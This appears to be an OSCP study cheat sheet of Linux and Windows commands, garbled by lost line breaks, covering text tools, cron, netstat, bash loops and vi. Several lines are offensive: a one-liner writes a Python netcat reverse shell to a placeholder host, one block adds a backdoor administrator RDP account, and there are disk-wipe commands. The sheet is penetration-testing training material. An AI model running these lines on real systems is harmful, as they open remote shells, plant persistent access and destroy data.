Linux main commands in OSCPFind:find / -name file 2>/dev/nullls -ltr - Sort list by last modified. -time -reverse​# Remove recursively and its content. Very dangerous command!rm -rf ./directoryList what rights the sudo user has.sudo -l# This will send all permissions denied outputs to dev/null.find / -name file 2>/dev/nullWhichOutputs the path of the binary that you are looking for. It searches through the directories that are defined in your $PATH variable.which bash# Usually outputs: /bin/bash​Filters#sortsort test.txt#uniqsort -u test.txtsort test.txt | uniqcat filename | sort -u > newFileNamegrep​head​tail​tr​sedsed "1d"​#cut :64 bytes from 192.168.0.1: icmp_req=1 ttl=255 time=4.86 mscut -d" " -f4-d stands for delimiter. and -f for field.​tr - TranslateTransform all letter into capital letterstr "[:lower:]" "[:upper:]" < file1 > file2​Remove character# Remove characterscat file.txt | tr -d "."​# Remove all dots and replace them with underscore.cat file.txt | tr "." "_"​awkawk '/search_pattern/ { action_to_take_on_matches; another_action; }' file_to_parse​awk '/172.16.40.10.81/' error.log​awk '{print}' filename​We can use the -F flag to add a custom delimiter. : awk -F ':' '{print $1}' test.txt​So if you are manipulating some text you might want to start the output with some info about the columns or something like that. To do that we can use the BEGIN-keyword.awk 'BEGIN {printf "IP-address \tPort\n"} /nop/ {print $3}' test.txt | headawk 'BEGIN{printf "IP-address \tPort\n"} /nop/ {print $3} END {printf "End of the file\n"}' test.txt | tail​# list cronjobscrontab -l​# Edit or create new cronjobscrontab -e​#List all devicesfdisk -l​#Systemctlsystemctl start sshsystemctl status sshsystemctl stop ssh​Netstat - Find outgoing and incoming connectionsNetstat is a multiplatform tool. So it works on both mac, windows and linux.$ netstat -antlp​netstat -anpt​iptables -L​# Remove one specific ruleiptables -D INPUT 2​​
Iteration over a file
This script will iterate over a file and echo out every single line:#!/bin/bash​for line in $(cat file.txt);doecho $linedone​
Another Way
​#!/bin/bash​while read p; doecho $pdone <file.txt
For Loops
#!/bin/bash​for ((i = 0; i < 10; i++)); doecho $idone​Another way to write this is by using the program seq. Seq is pretty much like range() in python. So it can be used like this:​#!/bin/bash​for x in `seq 1 100`; doecho $xdone
#!/bin/bash​locate 646.c | tail -n 1​This can be done like this:#!/bin/bash​cat $(locate 646.c | tail -n 1)
VI Operators
VI -OperatorsOperators are commands that do things. Like delete, change or copy.c - changece - change until end of the word.c$ - change until end of line.​Combining Motions and OperatorsNow that you know some motion commands and operator commands. You can start combining them.dw - delete wordd$ - delete to the end of the line
Password Creation
openssl passwd sam​
Windows Commands
cmd:​show hidden files:dir /A​Print out file content, like cattype file.txt​grep filesfindstr file.txt​show network informationnetstat -an​Show network adapter infoipconfig​Traceroutetracert​List processestasklist​Kill a processtaskkill /PID 1532 /F​Shreds the whole machineciper /w:C:\​Mounting - Mappingwmic logicaldisk get deviceid, volumename, description​
Scripts for fun
Make Request:import requests​req = requests.get("http://site.com")print req.status_codeprint req.text​Read and write to files​file_open = open("readme.txt", "r")for line in file_open:print line.strip("\n")if line.strip("\n") == "rad 4":print "last line"​​echo 'import os; os.system("/bin/nc ip port -e /bin/bash")' > /opt/tmp.py​
​
Add RDP User
WindowsAdd RDP usernet user hodor Qwerty123! /addnet localgroup administrators hodor /addnet localgroup "Remote Desktop Users" hodor /add
Enable RDP via Registry
Enable rdp via regsitry​